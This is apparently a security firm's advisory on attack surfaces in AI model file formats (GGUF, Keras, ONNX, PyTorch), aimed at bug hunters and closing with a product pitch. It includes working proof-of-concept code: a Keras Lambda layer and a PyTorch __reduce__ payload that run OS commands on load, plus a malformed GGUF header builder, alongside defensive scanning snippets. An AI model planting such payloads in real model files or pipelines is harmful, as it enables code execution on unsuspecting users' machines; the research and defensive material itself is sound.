Back to Research
Advisory

The Overlooked Attack Surface: Hunting 0-Days in AI Model Files

Eresus Security Research Team
April 1, 2026
5 min read

When discussing cybersecurity in Artificial Intelligence, everyone fixates on API security, prompt injections, and web vulnerabilities. Meanwhile, a massive, uncharted attack surface is hiding in plain sight: Machine Learning (ML) Model File Formats.

After training a large model, such as those behind ChatGPT, the weights must be saved. However, files with extensions like .pkl, .gguf, .onnx, or .pth aren't just simple data blobs. They are complex formats with their own parsing quirks, headers, and mechanisms capable of interacting with the operating system.

The critical moment? The moment a user (or an automated pipeline) loads that model file into memory. Buffer overflows, Remote Code Execution (RCE), and all the dark arts of traditional binary exploitation awaken in a fresh context that hasn't been picked clean by decades of security research. If you're a bug hunter, this is largely uncharted territory.

At Eresus Security, we are actively investigating the top structural vulnerabilities hidden in AI model loading—known as Model File Vulnerabilities (MFVs).


1. GGUF Heap Overflow: A Vulnerability in Model Parsing

In frameworks utilizing the relatively new GGUF format (like ggml), the parsing logic reads the model's key-value metadata. If the codebase fails to properly validate header fields—such as n_kv (the number of key-value entries)—it opens the door to out-of-bounds writes on the heap.

How it Works: The file header dictates how many key-value pairs the loader should expect. The loader allocates an array based on this number. If an attacker manipulates the n_kv value to be absurdly huge, the loop writing the values will blow past the allocated memory boundaries, leading to heap corruption.
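The attacker's side of this is easy to make concrete. The sketch below packs a minimal GGUF-style header with an inflated count; the field layout (magic, uint32 version, uint64 tensor count, uint64 key-value count, little-endian) follows the published GGUF spec, but the rest of the file is deliberately omitted, since only the trusted counter matters here:

```python
import struct

# Sketch of a GGUF-style header with an attacker-inflated n_kv field.
# Layout per the GGUF spec: magic bytes, uint32 version, uint64 tensor
# count, uint64 metadata key-value count (all little-endian).
MAGIC = b"GGUF"
version = 3
n_tensors = 0
n_kv = 2**62  # absurd count the loader may trust blindly

header = MAGIC + struct.pack("<IQQ", version, n_tensors, n_kv)

print(len(header))            # 24-byte header
print((n_kv * 24) % 2**64)    # what naive 64-bit `count * sizeof(entry)` wraps to
```

A C loader computing `malloc(n_kv * sizeof(entry))` with this count wraps around to a tiny allocation (here, literally zero bytes), while the copy loop still iterates `n_kv` times: the classic integer-overflow-to-heap-overflow pattern.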

What to look for? Scan for C/C++ memory allocation functions (malloc, calloc) that blindly trust counters extracted from headers inside loading functions like parse_header() or read_weights().


2. Keras Lambda Layers: Code Execution Risks

Keras models (such as .h5 files) can embed custom code via Lambda layers. While technically a "feature," loading a Keras model that contains a Lambda layer means you are inherently executing arbitrary Python code. (Modern Keras mitigates this with a safe_mode flag on loading, but it can be disabled, and legacy loaders never had it.)

An attacker can bake malicious code into a Lambda layer within a seemingly benign Keras model. When the victim runs the standard loading function, they unwittingly achieve RCE:

from keras.models import Sequential
from keras.layers import Dense, Lambda

# Setup for a potential vulnerability
model = Sequential([
    Dense(64, input_shape=(32,)),
    # The serialized lambda runs the OS command when the layer executes
    # during model reconstruction, then passes the tensor through unchanged.
    Lambda(lambda x: [__import__('os').system('echo breach'), x][1]),
    Dense(10, activation='softmax')
])

What to look for? When reviewing MLOps projects, terms like "supports arbitrary Keras models" or "custom dynamic ops" are massive red flags if sandboxing is not explicitly mentioned.
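One cheap triage step is to inspect a model's architecture config for Lambda layers before ever calling the loader. In the HDF5 format, Keras stores this config as a JSON string in the file's `model_config` attribute (readable with h5py without deserializing anything). The sketch below assumes you have already extracted that JSON string; the helper name is our own:

```python
import json

def config_has_lambda(model_config: str) -> bool:
    """Recursively search a Keras model-config JSON for Lambda layers,
    including layers nested inside sub-models."""
    def walk(node):
        if isinstance(node, dict):
            if node.get("class_name") == "Lambda":
                return True
            return any(walk(v) for v in node.values())
        if isinstance(node, list):
            return any(walk(v) for v in node)
        return False
    return walk(json.loads(model_config))

benign = '{"class_name": "Sequential", "config": {"layers": [{"class_name": "Dense"}]}}'
shady  = '{"class_name": "Sequential", "config": {"layers": [{"class_name": "Lambda"}]}}'
print(config_has_lambda(benign), config_has_lambda(shady))  # False True
```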


3. ONNX Custom Operators: Hidden Control Flow Exploits

ONNX (Open Neural Network Exchange) acts as a universal Rosetta Stone for ML models. However, the ONNX format supports deep control flow structures (If/Loop nodes) and Native Custom Operators designed for "performance."

ONNX allows models to register custom operations executed directly as C++/CUDA native code. If a machine learning pipeline blindly loads an ONNX file whose complex branching logic is intertwined with native calls, the attacker can manipulate the execution path, transforming an ML model into a sophisticated, compiled exploit delivery system.
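As a static triage step, you can enumerate operator domains in a graph before handing the file to a runtime. The sketch below works on (domain, op_type) pairs; with the onnx package you would extract them as `[(n.domain, n.op_type) for n in model.graph.node]`. The allowlist and function name are our own illustrative choices:

```python
# Standard ONNX operator domains; the empty string is the default ai.onnx domain.
STANDARD_DOMAINS = {"", "ai.onnx", "ai.onnx.ml"}

def flag_custom_ops(nodes):
    """nodes: iterable of (domain, op_type) pairs from an ONNX graph.
    Returns the operators living outside the standard domains."""
    return sorted({(d, op) for d, op in nodes if d not in STANDARD_DOMAINS})

nodes = [("", "Conv"), ("ai.onnx", "Relu"), ("com.vendor", "FusedKernel")]
print(flag_custom_ops(nodes))  # [('com.vendor', 'FusedKernel')]
```

Any hit here means native code outside the standard opset will run at inference time, and deserves manual review before the model touches a production runtime.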

What to look for? Search codebases for register_custom_op() or add_implementation(). Security researchers should employ structure-aware fuzzing (using tools like AFL++) to test edge cases.


4. Breaking Down a PyTorch MFV (Proof of Concept)

Let's break down an example Model File Vulnerability (MFV) to understand how a trusted tool like PyTorch can be exploited at scale. This is a perfect starting point if you're looking to find and report your own MFVs.

The Role of Pickle in PyTorch: PyTorch uses Python’s pickle module for its torch.save() and torch.load() functions. The pickle protocol involves calling an object's __reduce__ method to determine how to rebuild it. If an attacker can override this method, they can control what happens during deserialization—leading to arbitrary code execution.
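The mechanism is easy to demonstrate with the pickle module alone, no PyTorch required. This harmless sketch swaps the OS command for print so you can watch __reduce__ fire at deserialization time:

```python
import pickle

class Demo:
    # __reduce__ tells pickle how to rebuild the object. Here, "rebuilding"
    # means calling print with our argument, so unpickling runs our code.
    def __reduce__(self):
        return (print, ("__reduce__ ran during pickle.loads",))

blob = pickle.dumps(Demo())
pickle.loads(blob)  # prints the message: our code ran during deserialization
```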

A Step-by-Step Walkthrough

Crafting the Malicious Model: A custom PyTorch module is defined to override __reduce__. In our PoC, the overridden method instructs the deserialization process to run an OS command (touch /tmp/poc) as soon as the model is loaded.

import torch
import os

class OverwriteFile(torch.nn.Module):
    def __reduce__(self):
        # This payload causes os.system to run the command when deserialized.
        return (os.system, ("touch /tmp/poc",))

# Create and save the malicious model.
malicious_model = OverwriteFile()
torch.save(malicious_model, "malicious_model.pth")     

Executing the Payload: When an unsuspecting user tries to load the model using the standard PyTorch method, the payload triggers instantly:

import torch

# Loading the model triggers the __reduce__ payload. Note: since PyTorch 2.6,
# torch.load defaults to weights_only=True, which blocks this payload; the
# classic attack relies on weights_only=False (the long-standing old default).
torch.load("malicious_model.pth", weights_only=False)

This PoC performs arbitrary code execution to create /tmp/poc on the victim's machine.
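Flipping to the defender's side, you can triage a pickle stream statically with the standard-library pickletools module instead of loading it. (For a real .pth, note that torch.save writes a zip archive; the stream to scan is the data.pkl member inside it.) The opcode set and helper below are our own sketch:

```python
import os
import pickle
import pickletools

class EvilPayload:
    """Stand-in for the malicious module from the PoC above."""
    def __reduce__(self):
        return (os.system, ("touch /tmp/poc",))

def risky_opcodes(pickled: bytes):
    """Return pickle opcodes that can import callables or invoke them.
    Scanning with pickletools never executes the payload."""
    risky = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "REDUCE", "NEWOBJ", "NEWOBJ_EX"}
    return [op.name for op, _, _ in pickletools.genops(pickled) if op.name in risky]

blob = pickle.dumps(EvilPayload())  # serializing is safe; only loading executes
print(risky_opcodes(blob))          # the import + call opcodes betray the payload
```

A benign tensor-only pickle still uses some of these opcodes to rebuild objects, so treat hits as a signal for manual review (which globals are imported, and from which modules), not an automatic verdict.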


Why Should You Care? (The Bug Hunter's Gold Mine)

This vulnerability isn’t just a textbook case—it’s a gold mine for anyone looking to cash in on easy, high-impact exploits. Here’s why you should be all over it:

  1. Endless Discovery Potential: Use this PyTorch PoC as a launchpad to explore similar vulnerabilities across various model formats, parsers, and machine learning applications. Most apps don't sanitize models.
  2. Lucrative Rewards: With Bug Bounty platforms like huntr offering up to $3,000 per validated MFV, your next discovery could be both a reputation boost and a major payday. You don't need to be a reverse-engineering wizard; just bring your methodical curiosity to ML file formats!

Is your corporate infrastructure downloading opaque AI models from external sources? Let Eresus Security's Agentic Scanners audit your MLOps pipelines to secure your organization from 0-Day Model File Vulnerabilities.